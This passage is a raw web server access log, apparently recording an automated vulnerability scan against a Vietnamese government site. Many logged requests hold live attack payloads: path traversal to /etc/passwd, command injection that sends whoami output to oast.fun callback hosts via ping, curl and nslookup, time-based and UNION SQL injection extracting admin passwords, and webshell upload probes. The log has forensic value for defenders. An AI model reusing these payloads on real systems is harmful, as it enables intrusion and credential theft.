Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 210 2023-10-24 01:48:20 103.153.214.94 GET /logs/downloadMainLog fname=../../../../../../..//etc/passwd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209 2023-10-24 01:48:20 103.153.214.94 GET /logs/downloadMainLog fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 207 2023-10-24 01:50:51 103.153.214.94 POST /hms/user-login.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 207 2023-10-24 01:50:51 103.153.214.94 POST /js/jquery_file_upload/server/php/ - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 214 2023-10-24 01:51:14 103.153.214.94 POST /servlets/OmaDsServlet - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 787 2023-10-24 01:51:40 103.153.214.94 POST /configWizard/keyUpload.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 207 2023-10-24 01:53:08 103.153.214.94 POST /ajax/openvpn/del_ovpncfg.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 208 2023-10-24 01:54:13 103.153.214.94 POST /controller/ping.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn/controller/ping.php 405 0 1 822 2023-10-24 01:55:58 103.153.214.94 POST /task/loginValidation.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 208 2023-10-24 01:57:20 103.153.214.94 POST /service/extension/backup/mboximport account-name=admin&ow=2&no-switch=1&append=1 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 211 2023-10-24 01:57:20 103.153.214.94 GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207 2023-10-24 01:57:21 103.153.214.94 POST /service/extension/backup/mboximport account-name=admin&account-status=1&ow=cmd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 211 2023-10-24 01:57:33 103.153.214.94 GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206 2023-10-24 02:06:23 103.153.214.94 GET /index.asp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 209 2023-10-24 02:06:24 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 212 2023-10-24 02:07:01 103.153.214.94 POST /login/index.php login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.ckr701l02n34v9l7kpngjjfqdtbyjfkrh.oast.fun) 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 206 2023-10-24 02:07:14 103.153.214.94 GET /api/scrape/kube-system - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 0 2 625 2023-10-24 02:08:09 103.153.214.94 GET /api/v2/cmdb/system/admin - 443 - 95.111.241.172 Node.js - 404 0 2 218 2023-10-24 02:08:10 103.153.214.94 PUT /api/v2/cmdb/system/admin/admin - 443 - 95.111.241.172 Report+Runner - 404 0 2 214 2023-10-24 02:09:12 103.153.214.94 GET /admin/login/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 301 0 0 210 2023-10-24 02:12:35 103.153.214.94 POST /classes/Login.php f=login 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 210 2023-10-24 02:12:35 103.153.214.94 GET /admin/ - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 212 2023-10-24 02:13:31 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 212 2023-10-24 02:14:54 103.153.214.94 POST /SamlResponseServlet - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 792 2023-10-24 02:15:47 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 218 2023-10-24 02:18:10 103.153.214.94 GET / lang=../../thinkphp/base 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 591 2023-10-24 02:18:12 103.153.214.94 GET / lang=../../../../../vendor/topthink/think-trace/src/TraceDebug 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 207 2023-10-24 02:19:36 103.153.214.94 POST /aspera/faspex/package_relay/relay_package - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 793 2023-10-24 02:22:05 103.153.214.94 POST /banker/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 209 2023-10-24 02:23:12 103.153.214.94 GET /accounts/login/ - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 208 2023-10-24 02:23:50 103.153.214.94 POST /jeecg-boot/jmreport/qurestSql - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 209 2023-10-24 02:24:07 103.153.214.94 POST /index.php c=blocked&action=continue 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 209 2023-10-24 02:24:22 103.153.214.94 GET /flash/addcrypted2 - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206 2023-10-24 02:24:23 103.153.214.94 POST /flash/addcrypted2 - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 206 2023-10-24 02:25:32 103.153.214.94 GET /fp-content/ - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 212 2023-10-24 02:25:34 103.153.214.94 GET /flatpress/fp-content/ - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 206 2023-10-24 02:26:33 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 465 2023-10-24 02:26:34 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 206 2023-10-24 02:33:20 103.153.214.94 POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 210 2023-10-24 02:35:38 103.153.214.94 POST /saas./resttosaasservlet - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 208 2023-10-24 02:35:57 103.153.214.94 GET /admin/suppliers/view_details.php id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 301 0 0 211 2023-10-24 02:36:50 103.153.214.94 GET /csrf - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 210 2023-10-24 02:38:38 103.153.214.94 GET /index.html - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-24 02:38:39 103.153.214.94 POST /api/operations/ciscosb-file:form-file-upload - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 400 0 0 235 2023-10-24 02:38:39 103.153.214.94 GET /index.html - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 206 2023-10-24 02:41:15 103.153.214.94 POST /kubepi/api/v1/users - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 210 2023-10-24 02:42:35 103.153.214.94 GET /api/v1/clusters/kubeconfig/k8s - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 234 2023-10-24 02:46:11 103.153.214.94 GET /atom.xml - 443 - 52.167.144.194 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 501 2023-10-24 02:46:11 103.153.214.94 GET /atom.xml - 443 - 52.167.144.194 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 391 2023-10-24 02:47:13 103.153.214.94 GET /downloader.php file=%3Becho+CVE-2023-23333|rev%00.zip 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 212 2023-10-24 02:52:36 103.153.214.94 POST /ajax/api/user/save - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 212 2023-10-24 02:52:58 103.153.214.94 GET / url=<img/src="http://ckr701l02n34v9l7kpngwmd65jbkomoha.oast.fun"> 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 212 2023-10-24 02:54:31 103.153.214.94 GET /geoserver/ows service=WFS&version=1.0.0&request=GetCapabilities 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 210 2023-10-24 02:55:17 103.153.214.94 GET /forms/doLogin login_username=admin&password=password$(curl%20ckr701l02n34v9l7kpngncwq4rb5p1mf8.oast.fun)&x=0&y=0 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-24 02:58:23 103.153.214.94 GET /setup/setupadministrator-start.action - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 208 2023-10-24 02:58:25 103.153.214.94 GET /server-info.action bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2XAKRcZULfaTkN3QpJyItEa4Y4K 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 206 2023-10-24 02:58:27 103.153.214.94 GET /setup/setupadministrator-start.action - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 206 2023-10-24 02:58:29 103.153.214.94 POST /setup/setupadministrator.action - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 206 2023-10-24 02:58:30 103.153.214.94 POST /dologin.action - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 205 2023-10-24 02:58:33 103.153.214.94 GET /welcome.action - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 208 2023-10-24 02:59:47 103.153.214.94 GET /session/login - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 209 2023-10-24 03:03:30 103.153.214.94 POST /inc/jquery/uploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 209 2023-10-24 03:03:32 103.153.214.94 POST /attachment/3/cbbab.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 207 2023-10-24 03:04:06 103.153.214.94 GET /spip.php page=spip_pass 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 210 2023-10-24 03:04:15 103.153.214.94 POST /module/jmsblog/index.php action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 206 2023-10-24 03:04:17 103.153.214.94 GET /modules/jmsblog/config.xml - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 207 2023-10-24 03:08:31 103.153.214.94 POST /index.php/management/set_timezone - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn/index.php/management/datetime 405 0 1 211 2023-10-24 03:10:15 103.153.214.94 POST /CFIDE/adminapi/accessmanager.cfc method=foo&_cfclient=true 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 211 2023-10-24 03:12:00 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 210 2023-10-24 03:12:02 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 207 2023-10-24 03:12:06 103.153.214.94 GET /api/hassio/app/.%2e/supervisor/info - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 400 0 0 225 2023-10-24 03:12:18 103.153.214.94 POST /classes/Login.php f=login 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 211 2023-10-24 03:12:49 103.153.214.94 POST /texteditor.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 207 2023-10-24 03:16:06 103.153.214.94 GET /_api/web/siteusers - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 644 2023-10-24 03:16:07 103.153.214.94 GET /_api/web/siteusers - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 406 0 0 207 2023-10-24 03:17:11 103.153.214.94 POST /cgi-bin/cstecgi.cgi - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 209 2023-10-24 03:17:15 103.153.214.94 GET /2XAKRLFDjSjoto3pljfQs2iWLBJ - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207 2023-10-24 03:18:29 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 211 2023-10-24 03:18:30 103.153.214.94 GET /modules/leocustomajax/leoajax.php cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 208 2023-10-24 03:19:59 103.153.214.94 GET /getsamplebacklog arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).ckr701l02n34v9l7kpngnozqjk641xdzs.oast.fun%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22bcvt.kontum.gov.vn%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 211 2023-10-24 03:25:21 103.153.214.94 POST /Servlet/Skins - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 208 2023-10-24 03:25:23 103.153.214.94 GET /2XAKQx69dJBeYX6ffk3dOHB8OpC.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 209 2023-10-24 03:26:46 103.153.214.94 POST /admin/login.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 211 2023-10-24 03:26:48 103.153.214.94 GET /admin/dashboard.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 301 0 0 206 2023-10-24 03:27:30 103.153.214.94 POST /enrollment/ajax.php action=login 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 208 2023-10-24 03:27:32 103.153.214.94 GET /enrollment/index.php page=home 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206 2023-10-24 03:29:02 103.153.214.94 GET /app service=page/SetupCompleted 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 208 2023-10-24 03:29:04 103.153.214.94 POST /app - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 207 2023-10-24 03:29:06 103.153.214.94 POST /app - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 211 2023-10-24 03:29:07 103.153.214.94 POST /app - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 204 2023-10-24 03:29:21 103.153.214.94 POST /app - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 205 2023-10-24 03:29:25 103.153.214.94 POST /app - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 205 2023-10-24 03:29:25 103.153.214.94 GET /app service=page/PrinterList 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 206 2023-10-24 03:36:23 103.153.214.94 POST /api/runscript - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 2 1043 2023-10-24 03:36:25 103.153.214.94 GET /_images/LDvENq - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 207 2023-10-24 03:40:49 103.153.214.94 GET / q=./gibbon.sql 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 214 2023-10-24 03:40:54 103.153.214.94 GET /ws/msw/tenant/'+union+select+(select+ID+from+SGMSDB.DOMAINS+limit+1),+'',+'',+'',+'',+'',+(select+concat(id,+':',+password)+from+sgmsdb.users+where+active+=+'1'+order+by+issuperadmin+desc+limit+1+offset+0),'',+'',+' - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209 2023-10-24 03:40:57 103.153.214.94 GET /appliance/login - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 206 2023-10-24 03:42:10 103.153.214.94 POST /jeecg-boot/jmreport/show - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 212 2023-10-24 03:52:59 103.153.214.94 POST /main/webservices/additional_webservices.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 208 2023-10-24 03:55:05 103.153.214.94 GET /mifs/aad/api/v2/admins/users - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 215 2023-10-24 03:55:32 103.153.214.94 GET /mifs/asfV3/api/v2/admins/users - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 209 2023-10-24 03:56:03 103.153.214.94 GET / - 443 - 95.111.241.172 python-requests/2.26.0 - 200 0 0 214 2023-10-24 03:56:03 103.153.214.94 POST 